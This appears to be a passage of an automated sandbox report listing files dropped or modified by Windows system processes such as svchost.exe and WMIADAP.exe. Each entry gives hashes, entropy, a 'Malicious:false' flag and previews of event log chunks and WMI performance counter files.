Preview:3...T.h.e. .S.y.s.t.e.m. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .a.p.p.l.y. .t.o. .m.o.r.e. .t.h.a.n. .o.n.e. .i.n.s.t.a.n.c.e. .o.f. .a. .c.o.m.p.o.n.e.n.t. .p.r.o.c.e.s.s.o.r.s. .o.n. .t.h.e. .c.o.m.p.u.t.e.r.....5...T.h.e. .M.e.m.o.r.y. .p.e.r.f.o.r.m.a.n.c.e. .o.b.j.e.c.t. . .c.o.n.s.i.s.t.s. .o.f. .c.o.u.n.t.e.r.s. .t.h.a.t. .d.e.s.c.r.i.b.e. .t.h.e. .b.e.h.a.v.i.o.r. .o.f. .p.h.y.s.i.c.a.l. .a.n.d. .v.i.r.t.u.a.l. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .P.h.y.s.i.c.a.l. .m.e.m.o.r.y. .i.s. .t.h.e. .a.m.o.u.n.t. .o.f. .r.a.n.d.o.m. .a.c.c.e.s.s. .m.e.m.o.r.y. .o.n. .t.h.e. .c.o.m.p.u.t.e.r... . .V.i.r.t.u.a.l. .m.e.m.o.r.y. .c.o.n.s.i.s.t.s. .o.f. .t.h.e. .s.p.a.c.e. .i.n. .p.h.y.s.i.c.a.l. .m.e.m.o.r.y. .a.n.d. .o.n. .d.i.s.k... . .M.a.n.y. .o.f. .t.h.e. .m.e.m.o.r.y. .c.o.u.n.t.e.r.s. .m.o.n.i.t.o.r. .p.a.g.i.n.g.,. .w.h.i.c.h. .i.s. .t.h.e. .m.o.v.e.m.e.n.t. .o.f. .p.a.g.e.s. .o.f. .c.o.d.e. .a.n.d. .d.a.t.a. .b.e.t.

Process:C:\Windows\System32\wbem\WMIADAP.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):3444
Entropy (8bit):5.011954215267298
Encrypted:false
SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
MD5:B133A676D139032A27DE3D9619E70091
SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
Malicious:false
Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai

Process:C:\Windows\System32\wbem\WMIADAP.exe
File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
Category:dropped
Size (bytes):48786
Entropy (8bit):3.5854495362228453
Encrypted:false
SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
MD5:DF877BEC5C9E3382E94FEA48FEE049AC
SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
Malicious:false
Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):67888
Entropy (8bit):4.041371331324477
Encrypted:false
SSDEEP:768:mTBTdqsqbqwc0bzq0YAKP5goweUe3FdJxPBuwDt/K1WocwKb:SRAciNXKP4CDPBuwDt/K1hcP
MD5:7E63E60E73966F738E46ADFEBB7EC310
SHA1:676DEE7A03A468FF20060051B981BE7869580D09
SHA-256:FF0B4DCBCD44BDD2B6FF783E8E448A64E8CBB82CDF85F7E9F8C8ED2CBFD7821D
SHA-512:750770BBFF5C0752992AABE830C0F3A47470F38453A8168159D5E12988C5A6D809AE1908E3A57B3C33EBE80A751F08E2EF78CFC01A6C6044ECC64DEC6D9A2F6A
Malicious:false
Preview:ElfChnk.................c.......c...............0....X.[.......................................................................3................i...........................=...................................................................................r...................................t...?...........................................F...................M...5...........................B.......................................................................................................&...............**..0...c........,..6.............&............i.Po.F.."..y.......A..m...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..2............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.C.A.P.I.2.F........)...G.u.i.d.....&.{.5.b.b.c.a.4.a.8.-.b.2.0.9.-.4.8.d.c.-.a.8.c.7.-.b.2.3.d.3.e.5.2.1.6.f.b.}.

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):4.1181568235432175
Encrypted:false
SSDEEP:768:SVUHiapX7xadptrDT9W84bW664k5Xyvk:tHi6xadptrX9WPbR
MD5:84BCF1D7EB2D62CC778C0DB8249B87DB
SHA1:EE2212E946036E8B01666139C57A6988A3D75FA3
SHA-256:D63850291791C5D70146A73BBFDE5E06ACE32D33229D74165C8B9B78F77EDD3F
SHA-512:0B631AAB097CA90C7E36F074EEB2064D12DA2D58185F23CD21517086778732ABB73C674A94F15D80FECDE612EE82A598DF8546E9C0D7FECA970E0002CFE4AC2B
Malicious:false
Preview:ElfChnk.........S...............S...................v........................................................................]................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........r...................m..............qo...................>...;..................**..............4.9...............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):4.4013147639327475
Encrypted:false
SSDEEP:384:FhGN+3N6sNSNYNLNjNUSNbN6NHNRNbNYN0NsNZN7NhNLNPNhN8NdNixNAwNioNZs:FGvsbF1QBjr1xCKuL48fpoQ
MD5:D352D15D6A29EC818FCCB7D131D827B4
SHA1:E83944244EF8A5B84B6A8DF486A5A5801937ED51
SHA-256:B57978A9C8C8B8D8DF2EC5AAE442504C7327951A2602CD8322378EB9E6AC0D57
SHA-512:CF9CDEAE9F69A19E36214B4C29D9C319B231675CD5B4B3A7BAC8F1EE23FFDB06E8E4188E0309A2B710EA1AC8948F72ED4EC7CA8209FA7C0255E1C3BA4614E959
Malicious:false
Preview:ElfChnk............................................lK..........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F....................C.......................J...............................................................i...................F......e...........**..............."s...........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):66960
Entropy (8bit):4.285755233928464
Encrypted:false
SSDEEP:384:BVNVmhsVPVUVvVoVTVXV8VMVxVIVyV5JVYV6VCiVfV5V/VBVAVOVqVqV1VHV3Vie:aI1u
MD5:4605B31F39A755C7820C3D0A9B894237
SHA1:AE5142A625FA1395E4012DBF8D5EC66DC04E01BF
SHA-256:2982DE7746EBB9F626799766FCFA619EEBA8D930DAA7B7C5A02C58B3352365D8
SHA-512:AE7277FFCEBA9174DC2095C2D63AAF3004F1C75126331D63FF1DFEFD76136F2E6943D53B9A207FC70949F374B3C95A300DABAC66B6ED1653463D7C12900AD60A
Malicious:false
Preview:ElfChnk.i...............i...................H........f./.......................................................................i................2.......................Z...=...........................................................................................................................f...............?...........................m...................M...F....................................................3.......................................................8..........................&...Y1......**..............H.T.6.........F..&...............................................................@.......X...a.!.....E..........@H.T.6............A...................................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t...'..Y.J.R>:..=_M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.A.p.p.X.D.e.p.l.o.y.m.e.n.t./.O.p.e.r.a.t.i.o.n.a.l...f.d.........N...M.i.c.r.o.s.o.f.t...W.i.n.d.o.w.s...S.e.a.r.c.h._.c.w.5.n.1.h.2.t.x.y.e.w.y.....l.o....**..............E2V.6.........F.

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):4.423265177202914
Encrypted:false
SSDEEP:384:67UhsmYDQlm9cKrRtUmNmHumtTmgm5wQXvZ7bmO8mfQE3mq9mqmxqm6nFmCWmnsn:XMrJcWHvqisqnvokZRKeTSPnSKn
MD5:34B35A683C68A73A1BF569F68E54DB0D
SHA1:FC5C102CFE726B21653E768ADA9A275FADA90550
SHA-256:82203A8B2AF5D6CF60E99ADA87DF17CED01A954F995B6649E26E1C08FB97BEC9
SHA-512:E547B36385DBFBAF0D825AE5475C3CEF0B1949E632402D94385794F1AA1A8A565738FA29C4F895894DB61B86CE7F29DF2D389CFF63D9D246AE5157BAB20DABB1
Malicious:false
Preview:ElfChnk..0.......0.......0.......0..........x...X...iS.~........................................................................................L.......................t...=...........................................................................................................................f...............?...........................m...................M...F...................................C\..........................................KJ...............H..;d.......X..............#...........%...........**.......0....................F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.46195821683625526
Encrypted:false
SSDEEP:96:ENVaO8sMa3Z85ZMLe5yrjjv3Z85ZCtV3Z85Zx3Z85Zu:aV7pp8nMLe8vvp8nCtVp8nxp8n
MD5:5ACAAE41499E7308E5275722CCD56A6B
SHA1:D725F4876F0F7AAA657E82D73E432AE1F64DFE03
SHA-256:75CBB6A56620AA15E6AA888A9DCCE34647D8C67B60003951B8E09B5A09CDC574
SHA-512:80F61A3EB53F16883C03C128C957DF1DCF29B43B847298B5BE94362A6FB0B9108B2932B75260CF709CFC08063D19B8EEAD8E1C2966A32A76377EE2E40CB1D10F
Malicious:false
Preview:ElfChnk.....................................P.......WW......................................................................k...............................................=...........................................................................................................................f...............?...................................p...........M...F...................................................................................................................................&...............**..p...........n.d.............g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):4.416807332891786
Encrypted:false
SSDEEP:1536:CbBN2A4VD7VAx8whAGU2woJQghgooKChi581UAkM:
MD5:8B93FFD74BA69D506BC1A7CA93434764
SHA1:8275F283E3EB6143F33D1B97C889D167963A9B41
SHA-256:9D1B6EA5CF8330CB2CE526B709669FCF7BD756EE43E30230B98F3FBE6B80D227
SHA-512:8EED6493C2C3B9BD2B0DB0ECF80B6FFCC007A1BB618725BC5681469894965CE2606589062BA941C6B29D23F9A5F46EE9613F2FA46AC0B587CB6130EA99E24A15
Malicious:false
Preview:ElfChnk.........b...............b...............@...........................................................................Z!H.............................................=...................................................................................%.......................................X...............?...............................................M...F...................................................................................................................................z...............**..............................g.&.........g....R....uJ.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):4.519960906808938
Encrypted:false
SSDEEP:768:7PB9TXYa1RFxRaayVadMRFyfqd9xZRta7Ea+5BVZUeaBhN1dJhlBlBJ9ZFN9NxKk:vXY5nVYIyyqED5BVZUeJ+EsiA881rXT
MD5:F2DD657C9A1CB9C4DE1DF89C0F45E5F1
SHA1:A9B48C4B4F004BE9F9641753D4BAEADD209BC4EF
SHA-256:7601EB81F47B9DFC18BAD436F6657EBFD07782F6C8BC681A76DEFC69C6104613
SHA-512:C226D4C11D55C8BA887F2A6314B2C797CA60A12B90C066E7929E0CF182440D3E246C9399D4118FD5E781C7998A85E78AEF363D54D68DA86E39BF6D9F07DA6441
Malicious:false
Preview:ElfChnk.........|...............|...................%DkZ........................................................................................>.......................f...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............................................................y...........>...........**................9..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:modified
Size (bytes):91344
Entropy (8bit):2.4884378802135716
Encrypted:false
SSDEEP:384:qhdo69CcoTorNorWorbvorTorZorQorNor7orqorlGhorDorrTo9orForAorlorM:qDCpI8DCpI+
MD5:C2F9DDC874D6890A9CBB8E5B618E7785
SHA1:7582FF454B7BD9CCB726288CB98177FCA8935ED0
SHA-256:87A1EF661041699B9420F0459BA1E803FB5C81C0C63519AB64471E7A374FB1A6
SHA-512:BC78E4BCA586E5A25ACF6F3B4D282808824962C79A7D2234A3647C21EFA7CB14CE2EC0591428A39B346FA5CDEF87EC13EF861A285BBE27A6A2B129999247A71F
Malicious:false
Preview:ElfChnk.....................................`J...L.............................................................................................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................&....................................3..................................=/..............U)..............................**...............k...............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....

Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.8512934663046342
Encrypted:false
SSDEEP:384:vhAiPA5PNPxPEPHPhPEPmPSPRP3PoP1P0mPQP1P9xP:v2Nz
MD5:B58E72BD85CF367466349FADCF9A5818
SHA1:0F561886DC1FC8FBCA5DC8CA10DB1A7C34CEE419
SHA-256:D6F533FC5273A6E86F4295EE8935D94CC1A1CCD12A0DCA9C6C9723F852772861
SHA-512:32893F184EE6EA667D4FA98625F5B0192256F05E072513D2F68C3078FA2002824DB743BF759C5DEF4EBFD92D4257E5EE06FF584D0F4A79D8A964FA2C65CFCA01
Malicious:false
Preview:ElfChnk......................................%...&.........................................................................p4..................N...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................................................................................'.......................**..x.............|..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):0.8432260898567245
                                                                        Encrypted:false
                                                                        SSDEEP:384:hhZ21JJgL4JJFiJJ+aeJJ+WBJJ+5vJJ+/UJJ+4fJJ+CwJJ+D2JJ+a2JJ+JtJJ+lD:hWXSYieD+tvgzmMvG5m2a0
                                                                        MD5:9BCAC131A0E1046D07A1126509C0163B
                                                                        SHA1:668C02B1F04155FC7C86DA0FD801AB8512D8E647
                                                                        SHA-256:A069A8295BD4D219C7E117748EC00A8CE85C3AD2F84991B77311E865DA012C90
                                                                        SHA-512:11CECFB1CC6FB52B75BBEADCB99337634B61B1D4B78514905846BC0D6F57704EFDD01E59177C0A843FB8346DF2AEF6FF00315D1597E526F4408368A0834B4E90
                                                                        Malicious:false
                                                                        Preview:ElfChnk......................................$...&............................................................................W................F...........................=...........................................................................................................................f...............?...........................m...................M...F...........................&...........................................................................................................&...........**..p............zu..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):3.136765029033778
                                                                        Encrypted:false
                                                                        SSDEEP:384:YhqhSx4h/y4Rhph5h6hNh5hah/hrhbhmhjh/h7hkh8hbhMh9hYwhChwh8hRqh28E:YbCyhLfISid
                                                                        MD5:D8A9364C2A73C13BD5856B2098B148FE
                                                                        SHA1:246D2BD0425327769639DDD2E3EAB16EAAFC47BD
                                                                        SHA-256:3BC0F301126D61B2589EF8EA5BFD37E99521C28A16A2448614DA5D2008383417
                                                                        SHA-512:C1E00E7A552DAE3757379821AB874FFBB73498B001266EF5A832AB77B660E700C581A10A66B7EA3DB617A6383DF8AC808CEFA6AA9D510973237040AFEE4A734E
                                                                        Malicious:false
                                                                        Preview:ElfChnk.........L...............L...........P........Q......................................................................g..%................6.......................^...=...........................................................................................................................f...............?...........................m...................M...F...........................&...............................n............................................................................v..........**..`............0H..............&............MVy...o.~........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):3.299614116317659
                                                                        Encrypted:false
                                                                        SSDEEP:768:WcMhFBuyKskZljdoKXjtT/r18rQXn8iLqa3:PMhFBuV
                                                                        MD5:7BBCE1A6E856D904039BACFFA90C55A7
                                                                        SHA1:C3FFB49873328C3A17FFF125BD311AB4A864DBB9
                                                                        SHA-256:8F96E6519D5B0F66F01D26CF62B9AB7C5D35353FE6BA0C55AA6A5D935AF5B4D0
                                                                        SHA-512:C74AF384495FE23ECBE2AE9410966CE14A886E80DB90DD68751EBBC470874A49A20E978E0D2FAE28942F534F24F0ABF70EED1390F102E70BFB1B5C1903C4F47B
                                                                        Malicious:false
                                                                        Preview:ElfChnk.........L...............L.........................................................................................~..................:.......................b...=...........................................................................................................................f...............?...........................m...................M...F...........................................................&...............m...........................5A..........................................**..x...........,.8..............&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.896745651566555
                                                                        Encrypted:false
                                                                        SSDEEP:768:nre2Q+uYvAzBCBao/F6Cf2SEqEhwaK41HZaWRSgELNnLi:WHf
                                                                        MD5:396196233DA144BC9B1AC36AEBA3FA42
                                                                        SHA1:B5800B9F323B93BCBCFA9D2F727A9975CACD6337
                                                                        SHA-256:4A268F50173502D662F85D13944A1249B58912BCD3BC9FA6B419CB1E561D2969
                                                                        SHA-512:A0C83A765A92F558C0BBD72D418D6C8A2AB26F90A71DA6B5342C1AC98E3BB3AC0A57E6DBA86AB7334276A0058863364C36D8205EEBEAF1B29B411860DA528F61
                                                                        Malicious:false
                                                                        Preview:ElfChnk.v.......x.......v.......x...........P...`...d........................................................................X.e........................................V...=...........................................................................................................................f...............?...........................m...................M...F.......................................................................................................................................&...........**..@...v.......<..:..........F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):1.924636023538134
                                                                        Encrypted:false
                                                                        SSDEEP:384:wh1kbAP1gzkw3kN5Ayqk+HkzGk+hkV3SuckzlckA66k+4DkzRxk+dkzwUk+rkzDx:wMAP1Qa5AgfQQn
                                                                        MD5:8EC9027553BC6E0AA226CBE3AA9AEC1A
                                                                        SHA1:3E261D8E27902EB9EEF0333F5716E2298FE8FA55
                                                                        SHA-256:A2261A47F8E8D6F1E200968E7080400155424C4DD140F281C48FEACD0017A010
                                                                        SHA-512:859C59B36EFF5DCEBD329ABED2952EE5ECE6B4D5A8918C341878E77ABEC82C6B2CA0F7392E5DF79C30A004ECF82664DBA87381739F55FC7D6547AC84DDA1BA65
                                                                        Malicious:false
                                                                        Preview:ElfChnk.....................................0_..0b.............................................................................o................b...........................=...........................................................................................................................f...............?...........................m...................M...F...........................................................&........................................&..............;....................R..........**..x...........HD................&...........|B._..Q=;C9.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):4.4435307576303655
                                                                        Encrypted:false
                                                                        SSDEEP:384:3hBE0EGEq0EJE9EdEmE0S4E9/8OaExy4vEeE0TEVzEfEm/8E3VEQEoEwDEfEtEMZ:35SWOQRjEHgl4iYlz
                                                                        MD5:A8DA15633D80829F32A3E0CD50CFD995
                                                                        SHA1:CD4DD833ED62AD6DEE8A4B109A0356075CCDB8EC
                                                                        SHA-256:30BF357C2ADCC24F1A1A48EA85302CB33B8993899685FFFFDC13CD2E4A15C05F
                                                                        SHA-512:C7D808E257302F4D08623CE5C5A8D622CE946ADAA2543EE97A1AD3759CF11F93FAAFC8D786CDD4B32A1CBC1E97D5472A30B2A1EBADD5014F7F11BF2B92F1EA8B
                                                                        Malicious:false
                                                                        Preview:ElfChnk.s...............s...................@.......N...........................................................................................&.......................N...=...........................................................................................................................f...............?...........................m...................M...F....................@...............>... ..E....................$...........(...&.......".......................F...........D...............Q......**......s....................F..&.......F...0.V%.d..wr........A..~...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                        Process:C:\Windows\System32\svchost.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):65536
                                                                        Entropy (8bit):3.3316790418382953
                                                                        Encrypted:false
                                                                        SSDEEP:384:ahYCAKRuKIYKxkKiCKVIAK8sL4K5VKjPKwnKZ/K50K8/0KXAKuWKSlK+NK8t3Kl/:a1T4hy3V3
                                                                        MD5:F7D62B056AB8FE4B83092B05915DD92A
                                                                        SHA1:7310B87EC20943EE7854A907C4F807D04D148ABF
